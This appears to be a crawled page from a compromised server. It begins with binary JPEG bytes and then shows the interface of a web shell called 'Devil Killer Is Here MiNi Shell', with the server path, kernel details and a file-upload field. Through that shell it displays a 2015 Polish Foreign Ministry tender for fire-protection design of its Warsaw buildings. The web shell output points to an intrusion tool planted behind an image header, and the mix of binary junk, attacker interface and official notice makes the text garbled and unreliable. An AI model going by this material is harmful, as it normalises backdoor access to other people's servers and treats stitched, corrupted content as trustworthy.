JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/35672-N-2015.html

<p class="kh_header"><b>Warszawa: Projekt zabezpieczeń przeciwpożarowych</b><br>
<b>Numer ogłoszenia: 35672 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Spraw Zagranicznych , Al. J. Ch. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 523 99 10, faks 022 523 81 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt zabezpieczeń przeciwpożarowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia stanowi wykonanie dokumentacji projektowej polegającej na podziale budynków MSZ mieszczących się przy al. J.Ch. Szucha 23 i na ul. Litewskiej 2/4 w Warszawie na strefy pożarowe. W zakres przedmiotu zamówienia wchodzi:
1.Wykonanie:
1.1. inwentaryzacji;
1.2. dokumentacji projektowej (projektu budowlanego, projektów wykonawczych, przedmiarów robót);
1.3. kosztorysów inwestorskich oraz specyfikacji technicznych wykonania i odbioru robót budowlanych - w zakresie dostosowania budynków Zamawiającego przy al. J. Ch. Szucha 23 i ul. Litewskiej 2/4 do zgodności z przepisami techniczno-budowlanymi i przeciwpożarowymi. Budynek zlokalizowany przy al. J.Ch. Szucha 23 w Warszawie ujęty jest w gminnej ewidencji zabytków. Budynek ten znajduje się na terenie wpisanym do rejestru zabytków, jako Stanisławowskie założenie urbanistyczne (decyzja z dnia 1 lipca 1975r. nr rejestru 543-A).
2. Uzyskanie wszelkich opinii, uzgodnień, zezwoleń, których obowiązek wynika z prawa polskiego oraz wykonanie innych opracowań, niezbędnych do uzyskania pozwolenia na budowę oraz uzyskanie pozwolenia na budowę w zakresie objętym projektowaniem.
3. Udział w charakterze biegłego, w pracach komisji przetargowej powołanej do przygotowania i przeprowadzenia postepowania przetargowego na roboty budowlane realizowane na podstawie opracowanej w ramach przedmiotowego zamówienia dokumentacji projektowej.
4. Pełnienie nadzoru autorskiego w czasie realizacji robót budowlanych.
II. Przedmiot zamówienia realizowany będzie w następujących etapach:
1. Etap I - wykonanie
1.1. inwentaryzacji w zakresie niezbędnym do realizacji przedmiotu zamówienia , przy czym Zamawiający udostępni następujące materiały :
1.1.1. podkłady budowlane budynków w formie elektronicznej,
1.1.2. inwentaryzację systemu sygnalizacji pożaru wykonaną w listopadzie 2013 r.
1.1.3. protokoły z przeglądów zerowych oznaczone klauzulą zastrzeżone (do wglądu po podpisaniu umowy przez Wykonawcę):
1.1.3.1. protokół z przeglądu zerowego systemu sygnalizacji włamania i napadu w obiekcie: Ministerstwo Spraw Zagranicznych al. J.Ch. Szucha 23, 00-580 Warszawa,
1.1.3.2. protokół z przeglądu zerowego systemu kontroli dostępu w obiekcie: Ministerstwo Spraw Zagranicznych al. J.Ch. Szucha 23, 00-580 Warszawa,
1.1.3.3. protokół z przeglądu zerowego systemu telewizji dozorowej CCTV w obiekcie Ministerstwo Spraw Zagranicznych al. J.Ch. Szucha 23, 00-580 Warszawa,
1.1.3.4. protokół z przeglądu zerowego systemu nagłośnienia w obiekcie: Ministerstwo Spraw Zagranicznych al. J.Ch. Szucha 23, 00-580 Warszawa.
1.1.4. dokumentacje powykonawcze ww systemów i sieci strukturalnej oznaczone klauzulą zastrzeżone.
2. Etap II:
2.1. Wykonanie wielobranżowego projektu budowlanego na podstawie posiadanych przez Zamawiającego Ekspertyz Technicznych dotyczących stanu ochrony przeciwpożarowej dla budynku Ministerstwa Spraw Zagranicznych położonego w Warszawie, opracowanych przez rzeczoznawcę do spraw zabezpieczeń przeciwpożarowych, oraz obowiązujących przepisów.
2.2. Uzyskanie niezbędnych uzgodnień, decyzji administracyjnych oraz pozwolenia na budowę.
3. Etap III - Opracowanie pozostałej dokumentacji obejmującej:
3.1. projekty wykonawcze;
3.2. przedmiary robót;
3.3. kosztorysy inwestorskie;
3.4. specyfikacje techniczne wykonania i odbioru robót budowlanych (STWIORB).
4. Etap IV - Udział w charakterze biegłego, w pracach komisji przetargowej obejmujący w szczególności wsparcie komisji w zakresie odpowiedzi na pytania wykonawców, dotyczące opracowanej dokumentacji oraz możliwości wprowadzania rozwiązań zamiennych.
5. Etap V - Pełnienie nadzoru autorskiego, obejmującego w szczególności:
5.1. sprawowanie nadzoru autorskiego na żądanie Zamawiającego lub właściwego organu w zakresie wskazanym w art. 20 ust 1 pkt 4 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 r., poz.1409 z późn. zm.), w tym:
5.1.1. wyjaśnianie na placu budowy wszelkich wątpliwości i zastrzeżeń dotyczących rozwiązań przyjętych w projekcie,
5.1.2. proponowanie i uzgadnianie ewentualnych rozwiązań zamiennych z Zamawiającym i innymi podmiotami działającymi na rzecz Zamawiającego (Inspektor nadzoru, wykonawca robót budowlanych), 
5.1.3. podpisanie przez Wykonawcę dokumentacji projektowej z naniesionymi przez wykonawcę robót budowlanych zmianami, 
5.1.4. uczestnictwo w odbiorze robót budowlanych, 
5.1.5. opracowywanie niezbędnych opinii, dokonywanie sprawdzeń proponowanych przez wykonawcę robót budowlanych rozwiązań projektowych i ich zatwierdzeń, które w toku prac okażą się konieczne, 
5.1.6. bieżąca współpraca z Inspektorem nadzoru oraz wykonawcą robót budowlanych, 
5.1.7. uczestniczenia w naradach dotyczących prowadzenia budowy minimum raz w tygodniu. 
5.1.8. Wykonawca zobowiązany będzie uczestniczyć w spotkaniach koordynacyjnych organizowanych przez Zamawiającego w trakcie realizacji części przedmiotu zamówienia opisanych w pkt II.1.4) II.2 i pkt II.1.4) II.3 niniejszego ogłoszenia. Spotkania koordynacyjne będą odbywać się w siedzibie Zamawiającego z częstotliwością nie mniejsza niż raz na dwa tygodnie
III. Zakres dostosowania budynku do obowiązujących przepisów 
1. W zakres dokumentacji projektowej będzie wchodziło zaprojektowanie następujących instalacji i systemów: 
1.1. systemu sygnalizacji pożaru (SSP), 
1.2. dźwiękowego systemu ostrzegawczego (DSO), 
1.3. awaryjnego oświetlenia ewakuacyjnego, 
1.4. oddymiania klatek schodowych. 
2. W dokumentacji projektowej należy uwzględnić wszystkie rozwiązania techniczne i zabezpieczenia pożarowe zawarte w części graficznej i opisowej Ekspertyz Technicznych posiadanych przez Zamawiającego, umożliwiające osiągnięcie celu - podział budynku na 19 stref pożarowych, m.in: 
2.1. wymianę drzwi znajdujących się w granicach stref przeciwpożarowych na drzwi w odpowiedniej klasie odporności ogniowej zgodnie z określonymi przez Zamawiającego Wymogami dotyczącymi wyposażenia drzwi oraz Wymogami dotyczącymi drzwi wewnętrznych, okien i kurtyn przeciwpożarowych, 
2.2. wydzielenie klatek schodowych poprzez zamknięcie ich drzwiami w odpowiedniej klasie odporności ogniowej oraz wyposażenie klatek schodowych w samoczynne urządzenia zabezpieczające przed zadymieniem lub służące do usuwania dymu, 
2.3. wymianę poszczególnych okien na okna w odpowiedniej klasie odporności ogniowej, 
2.4. wyposażenie poszczególnych okien w kurtyny przeciwpożarowe, 
2.5. montaż przeciwpożarowych klap odcinających na przewodach wentylacyjnych, 
2.6. obudowę drewnianych elementów konstrukcji dachu elementami o odpowiedniej klasie odporności ogniowej, 
2.7. dostosowanie wskazanych ścian i stropów do odpowiedniej klasy odporności ogniowej, 
2.8. wykonanie przeciwpożarowych wyłączników prądu, 
2.9. doprowadzenie przepustów instalacyjnych do wymaganej klasy odporności ogniowej. 
3. Dokumentacja powinna obejmować swym zakresem również projekty techniczne drzwi wraz z zestawieniem stolarki i ślusarki okiennej, drzwiowej, kurtyn przeciwpożarowych. 
4. Wykonawca zobowiązany jest opracować także scenariusz rozwoju zdarzeń w czasie pożaru. 
4.1. Podstawowym założeniem przyjętym przy opracowywaniu scenariusza pożarowego ma być zasada wydzielonej strefy pożarowej. Oznacza to, że pożar w jednym czasie występuje tylko w jednej strefie pożarowej. 
4.2. Celem opracowania ma być określenie zasad działania i współpracy urządzeń i instalacji przeciwpożarowych, aby stworzyć wydzieloną od pozostałej części budynku strefę objętą pożarem oraz zapewnić bezpieczną ewakuację osób przebywających w budynku. 
4.3. System sygnalizacji pożarowej w zależności od stanu alarmowego (alarm I lub II stopnia) ma wysyłać sygnały sterujące do niżej wymienionych urządzeń: 
4.3.1. DSO - przekazanie informacji o wykrytym zagrożeniu oraz konieczności natychmiastowego opuszczenia budynku, 
4.3.2. systemu kontroli dostępu - zwolnienie drzwi zabezpieczonych kontrolą dostępu w celu zapewnienia użytkownikom obiektu możliwości natychmiastowego użycia drzwi na drodze ewakuacyjnej, 
4.3.3. zwolnienie trzymaczy elektromagnetycznych, 
4.3.4. dźwigi osobowe - natychmiastowy zjazd na poziom parteru,
 4.3.5. pompy pożarowe - uruchomienie w celu podbicia ciśnienia w sieci hydrantowej wewnętrznej, 
4.3.6. załącza urządzenia służące do usuwania dymu, stanowiące wyposażenie klatek schodowych, 
4.3.7. uruchamia kurtyny przeciwpożarowe, 
4.3.8. monitoring pożarowy - powiadomienie o zaistniałej sytuacji Państwowej Straży Pożarnej. 
IV. Ogólne warunki projektowania instalacji i systemów: 
1. Należy uwzględnić przebieg istniejących tras kablowych w budynku w celu ich ewentualnego wykorzystania i optymalizacji kosztów oraz usprawnienia prac, związanych z rozprowadzeniem okablowania. 
2. Wszystkie zaprojektowane systemy i instalacje muszą współdziałać oraz być zintegrowane ze sobą oraz z innymi instalacjami, urządzeniami i systemami, znajdującymi się w budynku Zamawiającego. 
3. System SSP musi być podłączony do stacji monitoringu pożarowego Państwowej Straży Pożarnej - sposób podłączenia systemu musi zostać uzgodniony z Mazowieckim Komendantem Wojewódzkim Państwowej Straży Pożarnej. 
4. Opracowana dokumentacja musi zawierać wszystkie opracowania, niezbędne do prawidłowego wykonania robót budowlanych przez Wykonawcę oraz uruchomienia systemów. 
V. Parametry techniczne dotyczące budynków przy al. J. Ch. Szucha 23 i ul. Litewskiej 2/4. Budynki zlokalizowane przy al. J. Ch. Szucha 23 i ul. Litewskiej 2/4 stawią kompleks 4 budynków integralnie połączonych ze sobą o powierzchni użytkowej wynoszącej 20 500 m2, kubaturze wynoszącej 98 200 m3 i wysokości w najwyższym miejscu 23,00m. W budynkach znajduje się 13 klatek schodowych. Szczegółowe parametry budynków zostały określone w Ekspertyzach Technicznych dotyczących stanu ochrony przeciwpożarowej dla budynku Ministerstwa Spraw Zagranicznych położonego w Warszawie. 
VI. Wymagania dot. aktów prawnych 
1. Przedmiot zamówienia musi być wykonany zgodnie z obowiązującymi przepisami, polskimi normami, zasadami wiedzy technicznej i sztuki budowlanej, w szczególności z uwzględnieniem następujących aktów prawnych: 
1.1. Dokumentacja projektowa i STWIORB (będąca opisem przedmiotu zamówienia na wykonanie robót budowlanych), zostanie wykonana z uwzględnieniem zapisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.), dotyczących opisu przedmiotu zamówienia, w szczególności w zakresie zapewnienia uczciwej konkurencji; 
1.2. Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zm.); 
1.3. Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129). 
1.4. Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389). 
VII. Harmonogram rzeczowo-finansowy 
1. Termin realizacji poszczególnych Etapów: 
1.1. Etap I - do 60 dni od daty zawarcia umowy, 
1.2. Etap II - do 120 dni od daty odbioru przez Zamawiającego prac z zakresu Etapu I (z wyłączeniem pkt II 2.2), 
1.3. Etap III - do 60 dni od daty zatwierdzenia przez Zamawiającego wielobranżowego projektu budowlanego (pkt II 2.1), 
1.4. Etap IV - do 48 miesięcy od daty zawarcia umowy, 
1.5. Etap V - do 48 miesięcy od daty zawarcia umowy. 
2. Termin płatności za poszczególne Etapy: 
2.1. Etap I, Etap II i Etap III - po wykonaniu inwentaryzacji, uzyskaniu pozwolenia na budowę, wykonaniu całości dokumentacji zatwierdzonej przez Zamawiającego - 80% wynagrodzenia. 
2.2. Etap IV - po wyłonieniu Wykonawcy robót - 2% wynagrodzenia. 
2.3. Etap V - po zakończeniu robót budowlanych - 18% wynagrodzenia. 
VIII. Wymagania dotyczące formy opracowania 
1. Dokumentacja powinna być wykonana w następującej ilości egzemplarzy: 
1.1. Projekt Budowlany - 5 egz. (w tym 1 egz. - kserokopia potwierdzona za zgodność z oryginałem, po uzyskaniu pozwolenia na budowę), 
1.2. Projekty Wykonawcze - 4 egz., 
1.3. Przedmiary robót, kosztorysy inwestorskie - 2 egz. (oddzielnie dla każdego projektu wykonawczego), 
1.4. STWiORB - 3 egz. 
1.5. Inwentaryzacja - 3 egz. 
2. W/w opracowania powinny zostać dostarczone na płycie CD/DVD w następujących formatach: 
2.1. część opisowa - gwiazdka.doc oraz gwiazdka.pdf (wersja gwiazdka .pdf będąca zeskanowaną dokumentacją papierową), 
2.2. część graficzna - gwiazdka.dwg oraz gwiazdka.pdf (wersja gwiazdka.pdf będąca zeskanowaną dokumentacją papierową). 
3. Wszystkie opracowania powinny być sporządzone w sposób uniemożliwiający dekompletację ich zawartości. 
IX. Dokumenty, które zostaną udostępnione Wykonawcy zaproszonemu do składania ofert: 
1. Inwentaryzacja systemu sygnalizacji pożaru; 
2. Ekspertyza techniczna dotycząca stanu ochrony przeciwpożarowej dla budynku Ministerstwa Spraw Zagranicznych położonego w Warszawie - z marca 2012 r. przy al. J.Ch. Szucha 23, ul. Litewskiej 2/4 (marzec 2012 r.), 
3. Postanowienie nr. WZ.5595/299/12 Mazowieckiego Komendanta Wojewódzkiego Państwowej Straży Pożarnej z dnia 3 sierpnia 2012 r. 
4. Ekspertyza techniczna dotycząca stanu ochrony przeciwpożarowej dla budynku Ministerstwa Spraw Zagranicznych w zakresie zmian dla projektowanego Centrum Prasowego na parterze budynku głównego Ministerstwa Spraw Zagranicznych w Warszawie przy al. J.Ch. Szucha 23 oraz projektowanej przebudowy wejścia B do budynku od ul. Litewskiej 2/4 i wejścia C od strony budynku biurowo garażowego (czerwiec 2013 r.); 
5. Postanowienie WZ.5595.264.2013 Mazowieckiego Komendanta Wojewódzkiego Państwowej Straży Pożarnej z dnia 12 lipca 2013 r.; 
6. Wymogi dotyczące wyposażenia drzwi; 
7. Wymogi dotyczące drzwi wewnętrznych, okien i kurtyn przeciwpożarowych.
8. Wzory drzwi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10 000 PLN przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach potwierdzenia spełniania ww. warunku Wykonawcy wykażą się niezbędnym doświadczeniem tj. w przypadku Wykonawców ubiegających się o udzielenie zamówienia w ciągu ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie nie mniej niż dwie główne usługi odpowiadająca swoim rodzajem i wartością przedmiotowi zamówienia. Przez główną usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie wykonaną usługę polegającą na opracowaniu projektu budowlanego wraz z projektami wykonawczymi dla budynku użyteczności publicznej (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. 2002 Nr 75 poz. 690 ze zm.) o powierzchni użytkowej nie mniejszej niż 10 000 metrów kwadratowych, na podstawie którego uzyskano prawomocne pozwolenie na budowę, obejmującego swym zakresem między innymi instalacje: systemu sygnalizacji pożaru (SSP), dźwiękowego systemu ostrzegawczego (DSO), oddymiania klatek schodowych, oświetlenia ewakuacyjnego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach potwierdzenia spełniania ww. warunku Wykonawcy wykażą, że dysponują lub będą dysponować minimum dwuosobowym zespołem pracowników, w którego skład będą wchodzić osoby, legitymujące się aktualnym na dzień składania wniosków o dopuszczenie do udziału w postępowaniu poświadczeniem bezpieczeństwa lub pisemnym upoważnieniem kierownika Wykonawcy upoważniającym do dostępu do informacji niejawnych oznaczonych klauzulą zastrzeżone wraz z aktualnym na dzień składania wniosków o dopuszczenie do udziału w postępowaniu zaświadczeniem o odbytym szkoleniu z zakresu ochrony informacji niejawnych zgodnie z ustawą z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 1 października 2010 r., Nr 182, poz.1228), w tym: 
a) osoba posiadająca uprawnienia w specjalności konstrukcyjno-budowlanej odpowiadające wymaganiom określonym w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010, Nr 243, poz.1623 ze zm.) a także będąca aktualnie członkiem właściwej izby samorządu zawodowego, 
b) osoba posiadająca uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych odpowiadające wymaganiom określonym w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010, Nr 243, poz.1623 ze zm.) a także będąca aktualnie członkiem właściwej izby samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wniosek o dopuszczenie do udziału w postępowaniu; 
